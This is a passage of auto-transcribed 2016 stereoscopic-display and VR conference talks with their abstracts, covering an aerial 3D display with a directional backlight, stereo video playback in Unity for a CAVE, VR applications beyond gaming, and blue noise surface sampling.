backlight pixels. So there are lots of artifacts because the pixel structure is magnified with the lenses. So to make it practical, we use lens array like this. So the height of the elemental lens is very short and the phase of each row is different. So the bright part of the lens is different in each row. And with this lens and also we combine a vertical diffuser, then the bright part and dark part are averaged. And the image shown becomes quite uniform. And because this is a vertical diffuser, it does not disturb the directionality of light to the right and the left eye. Because basically the right and the left are parallel to the ground. So this is the image observed. So it's quite good and practical. And last year we demonstrated the system, but at that time the image was quite dark. So not very good. But we replaced the backlight with the brighter one and now it's much better. And here we are using it for liver surgery simulator. As I said, we are working with surgeons of University of Tsukuba hospitals. And this is the cancer and blood vessels are running. So it's similar and it's already used. So actually this is a scene of training of medical students in University of Tsukuba hospital. So back to the presentation's main story. We combined these two ideas to make a high resolution floating area display without moving parts. So this is the actual system we made. 
So this part is the aerial display we made 16 years ago. This part is the directional backlight which we used in the last year's presentation. So here and here the light to the left and the right eye gathers. And we realized directional backlight to gather light here and here. So when these parts, of course, when the viewer changes, the depth of these gathering points have to be shifted. We can achieve that by changing the interval of the bright parts. So these points can be moved backwards and forward by changing the interval of the bright parts. So the viewer can move forward and backward. So this is the actual system we made from the front. So this is a large lens to generate a real image in the air. And this is the backlight part. So this is the backlight. So lenses and the diffusers and so on. So this is the specification of the prototype system. So the scale is like this. Not very large, but we're using a 27, 24 inch LCD panel. So this is the observed image. So we took these pictures with the Fujifilm camera, 3D camera. And so this is the left eye view and the right eye view. And we attached a position sensor to the camera. With that configuration, we can realize motion paths also. So again, the video, would you click the slide please? Oops. Oh, it's not working. No. Okay, so actually the video is not working, but no. Actually the video is the video of this scene. Okay. And discussion. Actually, I just talked about the kind of realistic situation, but in actual optics, the lens includes aberration. So to show a large image, we actually because of the aberration, the backlight for the left eye and the right eye overlaps like this. To avoid this phenomenon, one effective way is a very simple way, is to narrow the aperture of the elemental lens to decrease the blur. And another point is that if we use the lens with large focal length here, then the aberration becomes smaller. So we can show a very large image without crosstalk. It's just a simulation based. We haven't made this system. But theoretically, we can enlarge the area of a little crosstalk. So conclusion. Our full HD area, 3D image is printed without moving parts by using a direction backlight. And to show a large image, we have crosstalk, as I said, small elemental lenses, and use of convex lens with larger focal length is effective. Thank you.
|
This paper describes a high resolution aerial 3D display using a time-division multiplexing directional backlight. In this system an aerial real image is generated with a pair of large convex lenses. The directional backlight is controlled based on the detected face position so that binocular stereoscopy may be maintained for a moving observer. By use of the directional backlight, the proposed system attains autostereoscopy without any moving parts. A wide viewing zone is realized by placing a large aperture convex lens between the backlight and the LCD panel. With the advantage of time-division multiplexing, a high resolution 3D image is presented to the viewer. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32233 (DOI)
|
Our first paper is an efficient approach to playback a stereoscopic video using a wide field of view. And we have two speakers. Professor John Lediza is associate professor of biomedical engineering at Marquette University where he directs the visualization laboratory also known as Marvel. Chris Larky is the visualization technology specialist for Marquette. His work combines a background in video production, motion graphics, broadcast engineering, and graphics programming. Gentlemen. Thank you very much for the opportunity on behalf of Chris and myself for the opportunity to present our work with you here today. So the backdrop for what we're discussing here is our large scale, a merciless environment and several other stereoscopic or active 3D displays that we have as part of the Marquette visualization lab or what we refer to as Marvel. So Marvel really contains these resources dedicated to not only research and teaching but also industry and outreach initiatives. We have the large scale, a merciless environment that you see here. This is a sort of a slightly different twist on the traditional cave. So this is an extra wide four sided cave. So it's about 20 feet wide, 10 feet tall, and 10 feet deep. And that was dictated by the end users that came forward during the planning portion of putting this cave together. Everything is back projected except for the floor. So we've got four projectors across the front. You'll see the specs on those in just a minute. Two per side and then two for the floor. We also have adjacent to this what we call the CDL or the content development launch where the content that you'll see today is created. We have the ability to test the content there before we move it into the cave. And then down on the right we have a hall screen or another 3D, active 3D display system that we can also use outside of the CDL. We opened about two years ago and over the course of that period we've provided academic experiences so at least hour long experiences for roughly a thousand students from 24 different classes and intend to different disciplines across campus. So we're a lot of things to a lot of people. If we look at all comers to the lab over the last two years we estimate that we've had about over 4,000, maybe close to 5,000 people through the lab. The other thing that's not presented here is the work that we're doing with head mounted systems, headsets, gear VR, Oculus Rift. We really use those purely as ways of showing our content in a portable manner. So when people want to collaborate with us but they can't always get to the cave we'll use this as a way of delivering that content. Here's some specs of our Marvel large scale environment. We've got 10 Christie projectors. You can see the specs there. Again, four on the front wall, two per side and two on the floor. This is run by six HP workstations. Again, you can see the specs of those up on the screen. So those are some constraints for us. We have a cluster based system and they figured into our objective here on the screen today. Our end user applications as well, they required a couple things. One was the ability not only to display the content but also interact within it. And most of the content we'll be talking about today is forward motion video that we obtained at a constant rate. Our 4K resolution is our front wall and our cave and we've got about 7K overall if you consider the sides as well. We have high frame rates that we need to deal with as well. So this set the context for our application. 
That is to develop an approach to playback of stereoscopic videos in a 3D world where we have the depth actually determined by the content. Okay. So all of our programs that we've been making in the cave over the past two years have all really been using the Unity game engine. So our traditional workflow is to build a virtual environment using things like 3D meshes, polygons, lights and use that type of rendering workflow. But so to do something that's completely video based but still keep it inside Unity was actually something that's a bit of an unusual combination. And we managed to do a couple of tricks that we figured out that I like to share with you. So the workflow to creating a video player inside Unity is actually not terribly unusual. We're making two cameras and two screens and basically configuring it so only the left camera can see the left screen and the right camera can see the right screen. But in order to actually pull it off and run it on a cluster on a 7K projection display all in sync, there were some challenges that went into that. So another reason we kind of had to customize the player is because our content was very highly customized. So this is just a sample frame of the kind of things that our students were producing. This was captured using a 6 GoPro camera rig using a camera rig that they 3D printed and designed themselves. So it's not your typical spherical stereo rig. This is actually a cylindrically projected panorama that only covers about 270 degrees horizontally. So the reason it's not completely spherical is because that field of view really kind of matches what you see in the cave typically because caves have an open back and things like that. So that's stereoscopic with left on the top and right on the bottom. So to start off we had to create a custom screen and the tool of choice that I used here was Blender which was really what we used to make a lot of our programs. But the modeling for this scene was just really make a custom screen. And for this one you're going to need your 3D glasses to see a sample of the kind of screen that we created. So it's really just a sphere that has a portion of it cut off. The top and the bottom are cut off and then it's open in the back. Now this is just one version that we've done. We've also done other versions that where we've matched, we've mirrored completely the physical models of the cave for a more precise alignment but this one is a cylinder basically. Also equally important is the UV mapping on this which we tuned quite a bit to make sure it matches the custom rig, the custom contact. So this is a view, sort of a simulated version of what you see in a headset. Now this isn't completely accurate because it's not a direct capture because what this is is really just a cropped version of the spherical panorama that I showed you earlier. The proper version would be projected onto the sphere so the aspect ratio would be a little bit more correct. And also because this was the students first attempt there's also some various issues, most notably the frame line at the top and the bottom. Most of that is outside of the field of view when you're viewing it inside the cave so it's not quite as flickery as you see it here. And this is a screenshot of the arrangement in Unity so as you can see my hierarchy is really quite simple. I have two cameras and two screens. 
The screens you see are mirror copies of the same object that just are using Unity's tagging system to specify whether it will be visible in the left eye or the right eye only. But what I'd also like to point out is some detail I have on the right side because that part is rather important to making this work in a high performance way. Starting from the bottom there, the movie script is a custom script that I wrote that does various things like user inputs to play and pause the video and also maintains some cluster synchronization code in there. But above that is the main video decoder. Now one of the main keys that makes this work is that we're taking in the video frame once, decoding it once, and then copying the texture data onto two separate objects. We use that by having the apparent object in the movie hierarchy which then, and then the two screens below that. Most other documentation would have the movie player and the texture updater component on the same object. But that didn't work for us because then you're decoding and moving the video texture through memory twice which is really problematic when you're dealing with 4K footage. So to summarize that, two copies of the object, they're on separate layers, labeled left and right only. And there's a couple other things that I think are also nice about this program. One of them is that in order to make the program a completely reusable video player, I did write some additional features to have it read the locations of the video files from an external file which can be edited without having to recompile the program. And the other thing is even though we're inside Unity, we're using an unlit shader just to get the video texture directly on screen without having to compute lights or shadows or anything like that. So that's for performance although we do have enough performance to spare on our system that we can do some hybrid stuff. The camera masks are a little bit unusual because the ability to have objects flagged per eye is actually something that only was added recently, starting with Unity 5.1 which really started to focus on VR extensively. So for the Unity 5.1 and onwards, we're using a part of the predefined Oculus prefab object for our camera rig. But we did have this working on Unity 4 using some steps I'll show you in a moment. So in order to run Unity on a cave, there's a number of additional pieces that are required. The one that we use is called middle VR and this handles things like the infrared tracking system, the clustering, the off-center camera projections and various inputs like that, cluster management, all the things that are missing in the default build of Unity. So the thing about middle VR is that the camera rig is loaded from a configuration file that's built at runtime. So we have to set everything up through script. So I've included a little piece of code here just because the ability to uncheck things inside a menu is not something that's really well documented in my opinion. So you actually have to deconstruct an object in there. Now one of the things that I think was also really beneficial that we kind of discovered the hard way was that the traditional default camera setups have obviously for stereoscopic you have camera separation. But that was actually producing a conflict for us because we were getting too much stereo because that worked for our first attempts with video where we had the video on a small surface where it was inserted into the scene and playing only a portion of your field of view. 
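To make that decode-once arrangement concrete, here is a small Unity sketch from the editor. The original player used the AVPro Windows Media plugin on Unity 4 and 5; the built-in VideoPlayer component stands in below purely to illustrate the pattern of decoding a frame once and sharing the texture with two screens on eye-specific layers. The layer names, render-texture size, and component wiring are assumptions, not the authors' code.

```csharp
using UnityEngine;
using UnityEngine.Video;

// Editor's sketch of the decode-once pattern. The real player used the AVPro
// Windows Media plugin; Unity's built-in VideoPlayer stands in here purely for
// illustration. Layer names are assumptions and must exist in the project's
// Tags & Layers settings.
[RequireComponent(typeof(VideoPlayer))]
public class StereoMoviePlayer : MonoBehaviour
{
    public Renderer leftScreen;   // screen whose UVs address the top half of the frame
    public Renderer rightScreen;  // screen whose UVs address the bottom half
    public Camera leftCamera;
    public Camera rightCamera;
    public string movieUrl;       // in the real player, read from an external file

    void Start()
    {
        // One decoder, one render target: each 4K frame is decoded and
        // uploaded to the GPU once. Placeholder size; match the source video.
        var player = GetComponent<VideoPlayer>();
        var target = new RenderTexture(2048, 2048, 0);
        player.renderMode = VideoRenderMode.RenderTexture;
        player.targetTexture = target;
        player.url = movieUrl;

        // Both screens sample the same texture; their UVs pick the correct half.
        leftScreen.material.mainTexture = target;
        rightScreen.material.mainTexture = target;

        // Put each screen on its own layer...
        int leftLayer = LayerMask.NameToLayer("LeftEyeOnly");
        int rightLayer = LayerMask.NameToLayer("RightEyeOnly");
        leftScreen.gameObject.layer = leftLayer;
        rightScreen.gameObject.layer = rightLayer;

        // ...and hide the opposite eye's screen from each camera.
        leftCamera.cullingMask &= ~(1 << rightLayer);
        rightCamera.cullingMask &= ~(1 << leftLayer);

        player.Play();
    }
}
```

The key point is that the 4K frame crosses the decoder and GPU memory once per frame, no matter how many screens display it. Returning to the camera-separation issue raised above: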
But if the movie plane is the entire scene and wrapping around you, then when the camera rotates, there's just the stereo is incorrect. So what we've done here is that we have a specific configuration where the camera separation, the eye separation for the two cameras is set to zero because the movie file itself already has the cameras pushed apart. So in order to make them conflicting or not exaggerated, we actually have a simplified approach for that. So this is also kind of also another early attempt that didn't work was trying to inject the two objects directly into the quad buffering rendering pipeline, but that was pretty unreliable. So this is kind of an example of the kind of content that we've been showing with using combination of photos or videos in our cave. I'll hand it over back to John to describe what we're looking at here. This is probably our most commonly used application currently. So this is what we started as an immersive fitness program through the lab. And we bring this up to show a couple of different things. On the left, you can see an implementation that we did locally following some success in Marvel. On the top right with your 3D glasses, you can see in this particular case, we're moving through a forward motion video or a still of at least moving through forward motion video. But on the right, as an application of the custom UV mapping that Chris was talking about, on either side of the screen, actually, there's some distortion that's been implemented to give the rider a sense that they're moving through the space at an increased rate. In contrast, on the lower left, for the immersive yoga program that we're running, that's just simply wrapped around the full available 7K resolution. And again, this has been something that was a challenge to work through and led to the developments that Chris has talked about, but has also been hugely popular at our system here. Also, these applications are a really good demonstration of why we're doing it in Unity at all instead of just a dedicated video player. Because as you can see on those screens here, we're not just playing a video. We try to bring a lot of interactivity to them. So by doing it in a flexible game engine, we can have live overlays, integrating live data. We can have do a lot more interactive things with our audio, including spatially positioned audio. We can have custom timers or modify the playback rate, which is something that's very useful for these workout videos. We have another student working on a system where we use a Bluetooth sensor on the bicycle to control the playback rate of the video. And basically, there's a lot of other clips. Another one that we've done that's not pictured here is a basketball simulator where we can test the reaction time of a person's ability to predict the direction that a player is going to move, either to the left or to the right. So these applications are kind of being used for other, to conduct other experiments and other experiences. The other one we wanted to feature here, and this feeds nicely into the portable version, our head mounted devices, is an architectural pre-visualization. And we also have a historical realization program. This is part of an ambitious program by the university, over a $100 million project to try and raise money for a research center. So we begin bringing stakeholders into this space and helping them to appreciate what it would look like. And again, taking advantage of a lot of the advancements that Chris has made. 
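Here is the editor's sketch of that zero-separation idea in plain Unity. The authors set this up through MiddleVR's runtime configuration, whose API is not reproduced here; this is only the plain-Unity equivalent of the concept.

```csharp
using UnityEngine;

// Editor's sketch: the parallax is already baked into the stereo footage, so
// the virtual rig must not add its own eye separation on top of it. The
// authors configure this through MiddleVR at runtime; that API is not
// reproduced here.
public class ZeroEyeSeparation : MonoBehaviour
{
    public Camera leftCamera;
    public Camera rightCamera;

    void Start()
    {
        // Explicit two-camera rig: co-locate both eyes so only the disparity
        // baked into the video remains.
        rightCamera.transform.position = leftCamera.transform.position;
        rightCamera.transform.rotation = leftCamera.transform.rotation;

        // Single-camera stereo path: remove the default eye offset as well.
        leftCamera.stereoSeparation = 0f;
        rightCamera.stereoSeparation = 0f;
    }
}
```

The design choice is simply that when disparity is baked into the footage, any additional separation in the virtual rig double-counts the stereo baseline. Returning to the architectural pre-visualization content: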
Here again, you see a crop from a spherical panorama rather than what you would see in the head-mounted display. And this is using the same technique; because it's a pre-rendered 3D render, it actually took several hours to render on a machine. But because it's all pre-rendered, we can take that rendered image and run it on mobile. So this is the same technique, the same stereo setup, but running on a Gear VR headset instead of running in a full cave. So another missing piece to really achieve high-performance video playback inside Unity is this third-party plugin called AVPro Windows Media. Unity does have some capability for movie textures built in, but it really doesn't have the level of performance that we require to play full-screen resolutions at 1080p or above. A lot of the stuff we run is 4K, which really requires a GPU-accelerated decoder, and that's really what AVPro Windows Media does. However, that doesn't really solve all of our problems, because there's still some finesse required in order to get proper playback, a smooth playback rate, from that. These are just some of the features of AVPro Windows Media that we liked, but I think I probably covered that earlier. So getting the video format in a way that we preferred was actually really quite challenging. One of the tips that I would have for you is to use the Xvid codec. Xvid is actually a pretty ancient media codec compared to others. It's a predecessor to H.264, and its simplicity is actually its strength for doing this type of playback: because it's so simple, it can decode 4K resolutions very quickly, even though it was never really designed for 4K. And because it's not efficient, it actually requires a very high bit rate of around 80 to 90 megabits per second. But that did actually allow us to achieve the frame rate that we needed, whereas with H.264 or H.265 the bit rates were lower, but they still struggled to stay in sync across the cluster. Thank you.
|
The affordability of head-mounted displays and high-resolution cameras has prompted the need for efficient playback of stereoscopic videos using a wide field-of-view (FOV). The MARquette Visualization Lab (MARVL) focuses on the display of stereoscopic content that has been filmed or computer-generated using a large-scale immersive visualization system, as well as head-mounted and augmented reality devices. Traditional approaches to video playback using a plane fall short with larger immersive FOVs. We developed an approach to playback of stereoscopic videos in a 3D world where depth is determined by the video content. Objects in the 3D world receive the same video texture, but computational efficiency is derived by using UV texture offsets to address opposing halves of a frame-packed 3D video. Left and right cameras are configured in Unity via culling masks so that each shows only the texture for the corresponding eye. The camera configuration is then constructed through code at runtime using MiddleVR for Unity 4, and natively in Unity 5. This approach becomes more difficult with multiple cameras and maintaining stereo alignment for the full FOV, but has been used successfully in MARVL for applications including employee wellness initiatives, interactivity with high-performance computing results, and navigation within the physical world. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32235 (DOI)
|
Okay, so our next speaker is Carolina Cruz-Nira, and she's going to be speaking about Beyond Fun and Games VR as a tool of the trade. Carolina is a pioneer in the areas of virtual reality and interactive visualization, having created and deployed a variety of technologies that have become standard tools in industry, government, and academia. She is well known worldwide for being the creator of the cave virtual reality system and her PhD work and for VR jugular. All right, I'm ready to go. Well, good afternoon, everybody. I'm actually going to take a little bit of flexibility here because my talk was actually a guest talk. So as a guest speaker, I have a little bit more freedom to talk more in general. And I also thought because it was the last talk of the day, it would be a nice way to hopefully bring together all the exciting things that we have heard throughout the year. So I'm going to start my talk with a very simple statement. As I've been going around talking in the last couple of years, we are starting to sort of lean in the direction that when we talk about virtual reality, we immediately think head mounted displays. In a lot of cases, that's the case, that's the situation. So when I give all my talks, this is always my first slide these days. Okay? There's a lot more to virtual reality than just head mounted displays. To me, virtual reality is whatever kind of technology that puts you there. And there can be pretty much anything. It can be the coolest game in the planet, but also it could be the inside of a human body. It can be an engineering design. Or it can be a travel to time through time to understand history events. So with that in mind, I'm going to spend the next five minutes taking us back in history. So this is why I put it here for you because this is how we were over 20 years ago. If you look at this picture, just remember this picture a little bit later because a lot of this sounds very familiar from what we have today. My place doesn't show up. We have Jaron Lanier with the VPL iPhone. We had the virtual reality guys. A bunch of other exciting things. And that was 20 years ago. And it seems sometimes that there's no memory in our community that we've been doing this for a long, long, long time. However, for me, I came into this world at that time in 1991. And my first experience, like probably most people today, first experience in virtual reality, was with a head mounted display. I was a very young graduate student at the time. And like everybody else, the mom and I put it on. What did I do? Whoa! Which you still hear a lot of people that have that try on Oculus Rift for the first time. Vibes, Gear VR, whatever. It's all like, whoa! This is super cool. But then, after I did that, because of course I was a PhD student on the hunting for a PhD thesis, I had to take a step back. And I started reflecting on what is exactly this thing doing for me. So the first thing that it did for me, I have to say as a disclaimer, I'm originally from Spain. So I'm very social. I like to be with my friends. I like to be with my people. I like to be with my 300 cousins and all that kind of thing. So when I go into virtual reality, the first thing that happens is I lost my friends. I lost my own body. I lost my environment. And I'm totally somewhat else that I don't have my usual frame of reference, which is, for example, my peripheral vision, where I see my hands, where I see my banks, where maybe I see the tip of my shoes. 
So to me, that was very annoying, again, after I went through the guao stages. Of course, perhaps because I'm a girl. You know, this whole thing on my head was just too much of stuff on me. I had things on my head. I have cables. I had things that kind of sucked into my face, created wrinkles, which I don't want wrinkles, you know, all that kind of thing. So it was really cumbersome. As much as I tried really, really hard, and again, I'm talking 1991, I cannot imagine a group of people sitting together with multiple headmounds that is placed on to share experience. And again, yeah, we're doing collaborative VR and all that kind of thing, of course. I still don't see that. Here is my typical scenario. Mom, dad, the kids, and grandma just finished dinner, and now we're going to watch the movie after dinner. I just don't see that as scenario with five HMDs in the living room, you know, and maybe I'm just sort of the weirdo of the virtual environments community. I just don't see that happening. I see scenarios where this technology, of course, is really helpful and very good, but there are some other scenarios that I think we're trying to force into the technology versus force the scenario drive, the technology. And then another thing that I noticed in 1991, which to me is still very familiar to what we do today, is really a lot, a lot of emphasis and focus on the entertainment value of this technology, and there is not much information to the public. Again, in community like ours, of course, we know, but to the public that this is way, way, way bigger than gaming and 3D movies. So, and then since I come from the background of computer engineering, of course, you know, we had the fact that we don't have, again, talking 1991, a very common infrastructure to develop applications. If you look at this, a lot of these points are still valid today. I mean, we have things like the Unity game engine that a lot of people are using through tools like middle of VR and tech v's and some other things, but still it's very difficult sometimes to move from platform to platform your applications. You cannot run something that runs in this particular application easily ported to a different technology. So, you know, we have the issue of simplicity as well, you know, how simple is simple and how complex is complex, you know. Nowadays, things are a lot simpler, you know, we have devices that you get your smartphone, your smartphone, you slap it in the device and you have a fairly amazing virtual reality device. Of course, we didn't have that back in the 90s. So, from all these in the 90s, this was what drove me to accept the offer from the electronic visualization lab to do my PhD in virtual reality. And then, you know, basically say, you know, I really need to figure out something to do that goes beyond this observation. So, I guess as part of my PhD research, you know, we developed the other VR, you know, that other thing out there, which basically was, well, let's build a physical space that is big enough that we can all bring ourselves into the virtual space and bring our friends with us into the virtual space, but still be there, that mysterious there that we want to be. So, that was the origin of the cave. I put you some historical pictures in here, you know, back in 1992 when the cave was shown for first time at SIGGRAPH, you can see people, people waited in line for five, six hours dancing in the audience, he remembers that as well. 
There was a lot of people because it really opened a lot of possibilities. So, between all the wealth of research that was being done with the display and the sort of side track of something like the cave, we leave the moment in time that was as exciting as it is today. I would say that timeframe between 1994, 1995, until about 2001, 2002 is what I call the booming years and we're in the second phase of those booming years. There was a lot of work that was being done, you know, a lot of exciting applications, a lot of engineering companies went to do virtual reality, we saw entertainment, we saw historical things, we saw scientific work and then suddenly, oh, I have a little digression here because this is, I was putting this because a lot of people have been asking me this throughout the day, that caves today are still unusable because they are a million dollars, that's just a little bit of a myth. With today's technology, we can build caves at a very, very inexpensive level. We have built a number of caves and they're 40, 50 thousand dollars, I'm currently developing one that by the time it's finished, it will probably be under 15 thousand dollars. Again, is it the top of the line? No, but if we are willing to make compromises in head mounted display technology like we are doing with the consumer technology that we see today, we should be prepared to do the same kind of compromises in these other technologies. Of course, you can buy a two million dollar head mounted display, you want a military grade, but you can buy three or four hundred dollars, HMD, if you compromise. Same situation with the cave, so this is my little digression in there, so for those of you that were asking me this morning about that. Going back to the time frames, we went through a period that I would say about ten years, which I call also the forgotten years of virtual reality, but the media just forgot all about us. I'm not sure what happened, I think part of what happened is that a lot of industries started to absorb the technology as part of their workflow, as part of the routine work, so it was not exciting anymore, and of course, it was not primarily in entertainment, it was in other aspects of human life, like engineering design, military training, mining operations, and some other things. I even did baby diapers designed for protein and gumball, fluid dynamics on baby pee and things like that in the cave, so that's my joke, but for some reason the press did not pick up on this, so we went through these kind of dark ages of virtual reality, and then suddenly around 2012, hey, we're back on the map because all of us know what happened with Oculus Rift, you know, and that being as a relatively modest project of an individual, it went into Kika started, the initial asking was about $200,000, got over $2 million, got a lot of attention, got the connection with Facebook, and here we are all today. So this is where we are today. When you talk about virtual reality, when the press does you what virtual reality is about, this is what we get. Now, this picture is all photographs from 2014 and 2015, and the little guy on the corner is my son, and that was just a few days ago, so this is very recent pictures. Now, let me back up to the one from the 80s. I see an issue here, guys. Do you guys see the issue? We are stuck where we were 20 years ago, and I don't mean to be negative, I just want people to realize where we are. Yes, we of course know a lot more of what we need to do to make it work. 
But if you look at what the media was promoting 20 years ago and what the media is promoting today, it's the same. What's the difference? Cheaper? Of course it's cheaper. More commodity hardware? Yes, okay. There used to be more women in the past, that's true. So to me, like I said, since it's the end of the day, I just want to give you some food for thought for the rest of the, for tomorrow, since tomorrow will be the main day for the engineering of virtual reality, because I think we are going on the same path that we were going 20 years ago, and I don't want that to happen. I really don't, because this is a very exciting technology. There's a lot of great things that we can do with it. A lot of the speakers today have presented amazing new technologies that are coming up, so we need to keep ourselves a little bit in focus on what exactly are we doing 20 years later? So my personal approach, Carolina approach, I'm like your financial advisor and your virtual reality advisor. Diversify. What are the point in history where we can be extremely diverse in virtual reality? So all these pictures are from my new center at the University of Arkansas in Little Rock. So we have a Humongous Cave, 26 projectors, more pixels that your eye can see, all that kind of cool stuff, some notes, cluster, la, la, la, la. But we are going, for example, as spherical screens as well. We are doing omnidirectional 360-degree as spherical stereo, utilizing ray tracing, so we compute the stereo at the pixel level. We are doing semi-mercy devices. We have a couple of virtual tables that are just with enough 3D and stereo to perform the task at hand on those tables. Touchable displays, of course, Oculus, Vibes, VR VRs and all that. And we are also experimenting with 3D mobile devices, which they are coming. The picture doesn't show, but again, my little son is my model. So that little tablet that he is using there for augmented reality is actually an autostereoscopic tablet to do that. So I think our approach to this should be diversification on the platforms. That brings a lot of challenges, of course, because developing for these platforms to have your applications, to be able to, I guess, using a term borrowed from the military industry, doing interoperability between all our displays and settings, is actually a really, really hard problem, both from the software engineering aspects as well as the hardware, because there is a lot of performance-related parameters that take into play and a lot of optics and some other issues. So but with this diversification, what is being really cool is that it has allowed us to do a number of interesting applications throughout the years. I have a few applications here and I'm going to let Chris wave at me when I run out of time. So I'll tell you some that are not entertainment, because again, my goal today was to get us to think a little bit beyond entertainment, but they're all very practical applications. The first one is very dear to me because I started doing this work when I was a graduate student and I finished it all when I was an assistant professor at Iowa State University, where we were actually starting to use virtual reality as a front-end to supercomputing simulations. So we were using a pretty, on those days, I was using, for those of you that are my age or older, we were using a connection machine, if you remember the famous connection machines. 
So I had, I remember it was about a thousand processor connection machine solving the molecular dynamics on the fly connected directly with a fiber optic link to the cave. So as the scientists were in the middle of the cave, they were able to do drug design interactively with the goal of not necessarily find a specific drug for a particular disease, but the goal of this application was to try to reduce the amount of experimental lab testing that the molecular biologists had to do. They had some intuition of some molecular structure that might or might not work, and they were using the cave to try to reduce that spectrum to then minimize the laboratory work. Down the line, we started our evangelical mission to tell engineering companies that this was a technology that will help them tremendously. So my first sort of experience was with John Deere, which is a company everybody knows. We, at least myself personally, worked with them over 12 years. So they were having a design problem that couldn't really figure out through traditional tools. So we used an immersive environment with, of course, 3D stereo and head tracking. And without getting into too much details, we, we helped them to find the problem that they've been really wrestling for months trying to figure out where the problem was. Some other applications, for example, we are working since a number of years now on using virtual reality as a certification tool in different disciplines that are very expensive to certify, like in this case, fire marshal certification for some complicated construction projects are very expensive where depending on what it is that is being built, sometimes they had to build a mockup. And by a mockup, I mean a real, almost half a scale something and then actually burn it and see what happens when there is a fire. So of course, this is a very expensive way to test that. So we've been doing a lot of different virtual reality simulations to helping this kind of testing and certification. I have a couple of quick videos that I wanted to show or something a little bit more recent since I'm out of time here. So let me just show this video real quick. So this is just something recent that we've been, we've been doing. This actually we send it out for SIGGRAPH, the deadline was yesterday for the VR village exhibit. So this is our little 3D table. It has a narration, but I'm not going to go through that. So let me skip a little bit where you can see it. So here you have our environment. Again, it's a lot simpler to use. Right now we have a smart drive just because we recycle it from the lab. So it gives us the right level of immersion, the right level of stereoscopic to do this particular task at hand, which is interactive dissection of a virtual cadaver. So this particular project is in the process of being commercialized and transferred to different medical schools because at this particular level that's what they need. They need to have their master physician that is teaching anatomy with the students in the surrounding kind of nearby looking at it the same way they would be looking at a cadaver, but at the same time they need to be able to see each other so they can have some conversations and some saying look at this, look at that, look at that. So there are a lot of interesting things out there that are beyond, again, gaming and entertainment that I think our technology can significantly help. And I'm going to skip real quick. You give me 30 seconds. 
Basically, I tried to condense my 20-something years of experience in like 15 minutes, but some of the things that I learned over the years, it certainly hurts a lot. I know we get very excited about what we're doing. I know we like people around us to get very excited about what we're doing, but we have to be a little bit careful to say, hey, this is all the things that we can do when in reality we're not even quite there yet. We have to be very, very careful with that. Another thing is one size doesn't fit all, and that applies really, really well for VR. There's a lot of flavors. There's a lot of varieties for virtual reality. So let's not just get hung up on one particular kind of virtual reality. Keep in mind it's just technology. A few years from now there will be some other things, but the concept is really how do we get to this there that there is generated in the computer. Another thing too, of course, is that in many contexts sometimes being able to have a group of people face to face, sharing the virtual space is what you need. And again, we can do collaborative virtual environments with representing your own body through avatars and all that. It's not the same. The face to face, the body language, the smiles, the little twitch on your face and all that is still very, very important in certain contexts for communications. I cannot say any more. It's a lot more than a really cool gaming and entertainment platform. But at the same time, when we get outside gaming, I see lots and lots of people doing work that is just flying through pretty models. There's a lot more to gaming, but there's also a lot more than just flying through pretty models where really nothing really happens. And then, of course, the infrastructure to do these things is still not quite at the level that it should be, so we can really unleash our own creativity. So that goes to all the people developing SDKs and that kind of thing. And we have very little interoperability between different platforms. I can guarantee you right now what I run in my devices is going to be really, really hard for you to run it in your own devices. And when you run on your device, it's going to be really hard for me to run it in my device because we don't have a lot of common infrastructure to do that. So with that, this is what I think is going to be hopefully the next 15 years, 10 years or so. Again, remember your financial VR advisor, diversify. All right, so with that, I appreciate your time and thank you very much.
|
The recent resurgence of VR is exciting and encouraging because the technology is at a point that it soon will be available for a very large audience in the consumer market. However, it has also been a little bit disappointing to see that VR technology is mostly being portrayed as the ultimate gaming environment and the new way to experience movies. VR is much more than that, there has been a wide number or groups around the world using VR for the past twenty years in engineering, design, training, medical treatments and many other areas beyond gaming and entertainment that seem to have been forgotten in the public perception. Furthermore, VR technology is also much more than goggles, there are many ways to build devices and systems to immerse users in virtual environments. And finally, there are also a lot of challenges in aspects related to creating engaging, effective, and safe VR applications. This talk will present our experiences in developing VR technology, creating applications in many industry fields, exploring the effect of VR exposure to users, and experimenting with different immersive interaction models. The talk will provide a much wider perspective on what VR is, its benefits and limitations, and how it has the potential to become a key technology to improve many aspects of human life. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32236 (DOI)
|
This is Frédéric Payan from France. He received a PhD degree in signal and image processing in 2004 from the University of Nice. He is now an assistant professor at the same university and a researcher at the I3S laboratory (CNRS). His research interests include geometry processing, and in particular compression, remeshing, and sampling of surfaces. And the paper, of course, is entitled Blue Noise Sampling of Surfaces from Stereoscopic Images. So, thank you for this introduction. Hello everybody. I'm going to present a work done with my PhD student Jean-Luc Peyrot and with Marc Antonini, his second supervisor. Our subject is very different from the previous topics. I'm going to talk about sampling of surfaces from stereoscopic images. Here is the summary of my talk. I first introduce the context, the motivation, and the objective of our work. Then I will present the notion of blue noise sampling. I will give you some details about the method we propose for sampling the surfaces. Then I will give some experimental results and a conclusion. The context of our studies is the digitization of 3D objects. Today, acquisition systems are able to create very massive point clouds to ensure the preservation of the finest details. The consequence is that the meshes we obtain from these point clouds are huge, with a lot of triangles. Sometimes the management of such surface meshes is very difficult or even impossible with mobile devices or workstations with limited capacities. One solution until now, the main one, is to add an additional step to enable the management. This extra processing can be a simplification of the meshes to reduce the number of vertices. It can be a remeshing step that will modify the connectivity and the geometry of the surface mesh, if possible to make the new mesh structured, which will simplify the processing. It can be a semi-regular remeshing, for example. It can also be a resampling step that will change the position of the vertices on the surface. Most of the time, it will also reduce the number of vertices. Finally, we can see that when we want to handle a numerical version of a physical object, there is a very long pipeline before the management. Moreover, the three main stages, acquisition, meshing, and resampling, for example, are done in three different devices or software packages. Our motivation during this research is to simplify this long pipeline that is needed for managing any 3D data generated by an acquisition device. Today, we only investigate the specific case of stereoscopic acquisition systems, and we only focus on the specific sampling called blue noise sampling. Our objective is to shorten this pipeline to get the good sampling, the blue noise sampling, at the output of the acquisition device and avoid the additional steps after. Our main idea is to generate the sampling pattern directly from the stereoscopic images. I just talked about blue noise sampling; I will briefly present this specific pattern. Blue noise sampling is known in image processing for its ability to avoid aliasing artifacts. In computer graphics, it is also a popular sampling because its characteristics are relevant for many applications, in rendering, imaging, numerical simulation, geometry processing, and so on. This sampling pattern is often associated with a Poisson disk distribution. You can see an example on the top right, on a two-dimensional domain. We also have an example in the middle right on a surface. This sampling pattern has a particularity. It is a uniform distribution in the 